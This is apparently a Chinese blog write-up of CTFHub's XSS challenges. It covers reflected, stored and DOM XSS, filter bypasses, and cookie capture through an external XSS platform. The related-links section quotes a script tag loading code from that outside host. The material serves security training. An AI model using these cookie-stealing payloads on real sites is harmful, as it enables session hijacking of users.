2023-7-27 ctfhubxss

最新推荐文章于 2024-05-15 22:52:56 发布
最新推荐文章于 2024-05-15 22:52:56 发布
阅读量194 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strider1123/article/details/131990574
版权

拖了好几天了,今天得赶紧把xss整完

xss:跨站脚本攻击(Cross Site Scripting),为与层叠式样表css区分写为xss

xss攻击能够用来盗用cookie,获取敏感信息等
xss攻击大概分为三种:反射型,存储型,DOM型,反射型和存储型也可以叫非持续型和持续型
攻击产生的原理是由于网页在处理用户输入的文本时将<script>等作为html的标签,执行了里面的代码,存储型将这些代码存储到了服务器上,DOM型则是不经过服务器,完全在浏览器段进行处理
来到ctfhub的xss里
第一关反射型,先试试能不能弹:

 可以看到它把我们的输入当作代码执行了:

我们需要到这个网站注册一下来接收我们弹出来的cookie:http://xsscom.com/

然后新建个项目

 选择默认模块

 然后就建好了

 将里面这段代码粘贴到刚才题目中上面的位置

 然后将这个页面本身的url复制下来放到下面的位置

最后send

 我们查看xss的网站:

 拿到了cookie.

能看出来反射型的利用方式需要诱导别人点击你构造的url才能抓取到他们的cookie,实战中能够应用到的场景可能比较少

下一个是存储型

在反射型中插入的代码不会被保存,只能被构造进url里

而在存储型中,我们点击了submit之后会发现代码被存了进去

 然后同样是点击了send之后,我们就能在xss网站上收到cookie

 下一个就是DOM型

这个dom型有点没太搞懂,感觉跟存储型一模一样,等我再瞅瞅

 dom跳转则可以参考这篇文章:https://blog.csdn.net/weixin_49125123/article/details/131546660

过滤空格:

将空格换成/**/

 成功

 最后一个过滤关键词

先试试<script>:

发现"script"被过滤掉了,大写试试

 成功

之后就和上面一样了

strider1123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfhub——web——xss
weixin_43906500的博客
05-14 239
题目如下,为反射xss
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
ctfhubxss
小宇的web博客
05-22 1641
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFhubxss漏洞
最新发布
weixin_46954909的博客
05-15 682
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
CTFHUB-XSS
weixin_51706044的博客
09-29 475
经过测试,第一个文本框是用于测试使用 第二个文本框应该是将信息发送至后台,进行处理, 因此我们只能是在XSS测试平台上进行获取注册成功后顺便创建一个项目,选择默认配置成功后会给一个地址 直接插入构造的url中即可这时会接受到一个信息 即可获得flag ...
CTFHub——XSS
2302_79119987的博客
03-28 943
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUB------XSS
qq_45616570的博客
06-23 728
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射xss 题目 解题思路 题目是xss反射 xss反射是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射的变量值 4.返回题.
CTFHub靶场————XSS
qq_61579604的博客
10-17 228
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1305
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4926
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
xss跨站攻击脚本概述
xu_1234567的博客
10-28 325
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久跨站(存储xss ):最直接的危害类,跨站代码存储在服务器(数据库) (2)非持久跨站(反射xss):反射跨站脚本漏洞,最普
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3327
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
ctfhub xss 反射
m0_63253040的博客
05-07 343
上面的框会改变html源代码的内容,试试弹窗 <script>alert(1)</script> 第二框输入内容后返回successfully 这里用xss platform 具体用法参考这个wp
CTFHUB——反射XSS详解
wuuconix's blog
09-01 7634
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射是相对于存储来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射xss。 <?
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 782
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
BUUCTF[第二章 web进阶]XSS闯关
2301_78136321的博客
09-26 630
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
XSS详解
分享与记录
03-24 782
XSS简介: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,将跨站脚本攻击的缩写改为XSSXSS是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种,恶意攻击者往web页面里插入恶意script代码,当用户浏览该网页时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。攻击成功之后,恶意...
CTFHUB------XSS反射(WP)
热门推荐
Y4tacker的博客
07-23 1万+
文章目录前言XSS测试平台 前言 一开始我直接在上面写js脚本发现出错,最后发现只能通过下面的输入框来执行XSS测试,于是我们只能用XSS测试平台解决问题 XSS测试平台 注册一个XSS测试平台 这里随便填写 勾选默认模块就够了,点击下一步 这时会出现一个找个将代码复制 拼接到网站后缀name后面,点击send 这时平台会收到一个记录点开即可 得到flag ...
CTFHub xss存储 wp
qq_73661602的博客
07-20 932
CTFHub xss存储 wp

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值